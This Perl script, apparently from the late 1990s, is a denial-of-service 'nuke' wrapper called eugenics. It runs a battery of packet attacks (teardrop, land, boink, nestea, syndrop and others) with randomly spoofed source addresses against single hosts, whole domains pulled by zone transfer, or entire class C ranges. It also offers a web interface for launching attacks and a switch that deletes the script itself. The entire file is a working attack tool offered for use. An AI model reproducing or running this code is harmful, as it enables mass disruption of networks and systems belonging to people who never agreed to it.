#!/usr/bin/perl # # eugenics (tekniq nuke) v0.9.9. # wh00p. there it is.. # vi's elite little nuke script.. # http://tekniq.net/nuke # # _okay.. let me explain this:_ # # eugenics is a complex wrapper to normal win95/nt DoS attacks.. # it runs: # flip, frag, land, jolt, boink, teardrop, newtear, ssping, and whatever # else you feel the desire to add.. OKAY?! # thanks. # # # if you can't figure this out.. just run `nuke.pl -s' and it'll fix it. # # todo: # x create a cgi interface for this script (built-in) # x do error checking-reporting. # # ** THIS COMES WITH NO SUPPORT FROM THE AUTHOR (vi) ** # if you need extensive help.. just type nuke.pl -s # use Getopt::Std; use File::Basename; #use Net::Ping; $| = 1; $basedir = "/root/code/bin/"; $frag = $basedir . "frag"; $flip = $basedir . "flip"; $land = $basedir . "land"; $jolt = $basedir . "jolt"; $boink = $basedir . "boink"; $teardrop = $basedir . "teardrop"; $newtear = $basedir . "newtear"; $ssping = $basedir . "ssping"; $pure = $basedir . "vi-pure"; $akill = $basedir . "akill2"; $syndrop = $basedir . "syndrop"; $nestea = $basedir . "nestea"; $output = "/dev/null"; $SIG{INT} = 'abort'; $version = "0.9.9"; $i = 0; $n = 0; $percent = 0; $quiet = 0; $ipaddr = "3.1.33.7"; $numhosts = 0; $argc = $#ARGV + 1; $progname = basename($0); $cgimode = 0; $launchfile = '/www/rain/nuke-launch'; $cgihead = '/www/rain/nuke-head'; $cgifoot = '/www/rain/nuke-foot'; $nonexistant = 0; $statdir = '/root/code/nukestat'; use vars qw($opt_q $opt_d $opt_h $opt_f $opt_s $opt_t $opt_c $opt_b $opt_p); getopts("tqbhsc:d:f:p"); $quiet = $opt_q || 0; # setting hosts not to attack. $purtek = '(tekniq.net|blackcat.net|0.0.0.0|127.0.0.1|208.154.103.55|209.16.130|wa.dial-access.att.net|iquest.net)'; # generate a random ip to attack from. srand time(); if (defined $opt_h) { print STDERR "[1;31meugenics $version.[0m\n\n"; print STDERR "usage:\n$progname [-q] [-d <domain>] [-c <class C>] [-f <file>] [-h] [host] [host]..\n\n"; print STDERR "\t-q - quiet execution (for use with scripts)\n"; print STDERR "\t-d <domain> - nuke an entire domain\n"; print STDERR "\t-c <class C> - nuke an entire class C\n"; print STDERR "\t-f <file> - take input from a file\n"; print STDERR "\t-h - help\n\n"; exit 0; } if (defined $opt_s) { unlink $0; } if ((defined $opt_d) || (defined $opt_c)) { if (defined $opt_d) { $domain = $opt_d; print "[H[J" . "querying server for domain: $domain..\n"; open DOMAIN, "host -l $domain |"; while (<DOMAIN>) { if ($_ =~ /has addr/) { /(\S+)\s.*?(\d+\.\d+\.\d+\.\d+)$/; $hostname = $1; $hostip = $2; if(($hostip !~ /$purtek/) && ($hostname !~ /$purtek/)) { $hosthash{$hostname} = $hostip; $numhosts++; } print "[H" . "\n\n" . "[J[1;30m[[0m" . "adding host " . $numhosts . " [1;30m" . ".. " . "[1;31m" . $hostname . "[0m" . "(" . "[1;31m" . $hostip . "[0m" . ")" . "[1;30m][0m" . "\n"; } } } else { ($a, $b, $c, $d) = split /\./, $opt_c; for ($d=0; $d < 255 ; $d++) { $host = join ".", $a,$b,$c,$d; if($host !~ /$purtek/) { $hosthash{$host} = $host; } } } } else { if ( $argc == 0 ) { if (defined $ENV{'QUERY_STRING'}) { $cgimode = 1; $quiet = 1; if ($ENV{'QUERY_STRING'} ne "") { $query_string = $ENV{'QUERY_STRING'}; $host = $ENV{'REMOTE_HOST'}; ($one , $two) = split /=/, $query_string; if (defined $two) { $webhosts = $two; } else { $webhosts = $one; } @hosts = split /\+/, $webhosts; system("/usr/bin/logger -t nuke '$webhosts nuked by $host'"); } else { open LAUNCHFILE, $launchfile; while (<LAUNCHFILE>) { print; } exit(1); } } elsif ( defined $opt_f ) { open NUKEFILE, $opt_f or die "can't open $opt_f: $!\n"; while (<NUKEFILE>) { chomp; if ($_ !~ /$purtek/) { push @hosts, $_; } } } else { print "taking input from console.\n"; while (<STDIN>) { chomp; if ($_ !~ /$purtek/) { push @hosts, $_; } } } } else { while ($_ = pop @ARGV) { if($_ !~ /$purtek/) { push @hosts, $_; } } } if ($cgimode == 1) { open CGIHEAD, $cgihead; while (<CGIHEAD>) { print; } close CGIHEAD; print "querying dns server..<br><br>\n"; } if ($quiet == 0) { print "[H[J" . "querying dns server..\n"; } foreach $hostname (@hosts) { if ($quiet == 0) { print "[H" . "\n\n" . "[J[1;30m[[0m" . "resolving host " . "[1;30m" . ".. " . "[1;31m" . $hostname . "[1;30m][0m\n"; } if ($hostname[0] =~ /^\d+\.\d+\.\d+\.\d+$/) { $hostip = $hostname; } else { (undef, undef, undef, undef, @address) = gethostbyname($hostname); next if (!@address); ($a, $b, $c, $d) = unpack('C4', $address[0]); $hostip = join ".", $a, $b, $c, $d; } if ($quiet == 0) { print "[0m" . "(" . "[1;31m" . $hostip . "[0m" . ")" . "[0m\n"; } if(($hostip !~ /$purtek/) && ($hostname !~ /$purtek/)) { $hosthash{$hostname} = $hostip; } else { print "[1:31m" . "rejected." . "[0m"; } } } if ($quiet == 0) { print "[H[J[0meugenics $version[0m\n"; } $numhosts = keys %hosthash; $noh = keys %hosthash; $numlen = $noh =~ s/\d/\d/g; if ($numhosts == 0) { print "\n\n[1;31merror:[0m no hosts selected.\n\n"; exit(1); } foreach $hostname (keys %hosthash) { $ipa = int rand 255; $ipb = int rand 255; $ipc = int rand 255; $ipd = int rand 255; $source = join ".", $ipa,$ipb,$ipc,$ipd; $i++; $percent = ($i / $numhosts) * 100; $ipaddr = $hosthash{$hostname}; if (!(defined $opt_t)) { if (defined $opt_p) { open STATHOST, ">> $statdir/stats"; $p = Net::Ping->new("icmp"); if ($p->ping($ipaddr)) { print STATHOST $hostname, "(", $ipaddr, ") ", time(), " alive\n"; } else { print STATHOST $hostname, "(", $ipaddr, ") ", time(), " dead\n"; } } # sleep(1); $exit{newtear} = system "$newtear $source $ipaddr -n 5 >> $output 2>&1"; $exit{frag} = system "$frag $source $ipaddr 5 >> $output 2>&1"; $exit{flip} = system "$flip $source $ipaddr 5 >> $output 2>&1"; $exit{boink} = system "$boink $source $ipaddr 25 65 5 >> $output 2>&1"; $exit{teardrop} = system "$teardrop $source $ipaddr -n 5 >> $output 2>&1"; $exit{land} = system "$land $ipaddr 23 >> $output 2>&1"; $exit{land} = system "$land $ipaddr 25 >> $output 2>&1"; $exit{land} = system "$land $ipaddr 113 >> $output 2>&1"; $exit{land} = system "$land $ipaddr 139 >> $output 2>&1"; $exit{ssping} = system "$ssping $source $ipaddr 5 >> $output 2>&1"; $exit{pure} = system "$pure $source $ipaddr >> $output 2>&1"; $exit{akill} = system "$akill $source $ipaddr >> $output 2>&1"; $exit{nestea} = system "$nestea $source $ipaddr -n 5 >> $output 2>&1"; $exit{syndrop} = system "$syndrop $source $ipaddr -n 5 >> $output 2>&1"; sleep(1); # select(undef, undef, undef, 0.25); if (defined $opt_p) { sleep(1); $p = Net::Ping->new("icmp"); if ($p->ping($ipaddr)) { print STATHOST $hostname, "(", $ipaddr, ") ", time(), " alive\n"; } else { print STATHOST $hostname, "(", $ipaddr, ") ", time(), " dead\n"; } $p->close(); close STATHOST; } } $attacks = keys %exit; foreach $estatus (keys %exit) { if ($exit{$estatus} == 32256) { $nonexistant++; } } print "\n"; if ($nonexistant == $attacks) { print STDERR "\n[1;31myou have no working exploits..\ngo edit this file.. and read.. smart one.[0m\n\n"; exit (-1); } if ($quiet == 0) { printf "[H\n\n[1;30m[[1;31m%." . $numlen . "d/%d[1;30m .. [1;31m%.3d\%[1;30m][0m\n", $i, $numhosts, $percent; print "[J[1;30m[[0;31m" . $source . " [0;37m->[1;31m " . $hostname . "[0;37m" . "(" . "[1;31m" . $ipaddr . "[0;37m" . ")" . "[1;30m][0m\n"; } if ($cgimode == 1) { print "[$source -> $hostname($ipaddr)]<br>\n"; } } if ($quiet == 0) { print "\ndone.\n"; } if ($cgimode == 1) { print "done<blink>.</blink>\n"; open FOOTER, $cgifoot; while (<FOOTER>) { print; } } if (defined $opt_b) { printf "\a"; } sub abort { print STDERR "\n\n[1;31maborted.. shutting down..[0m\n\n"; exit(0); }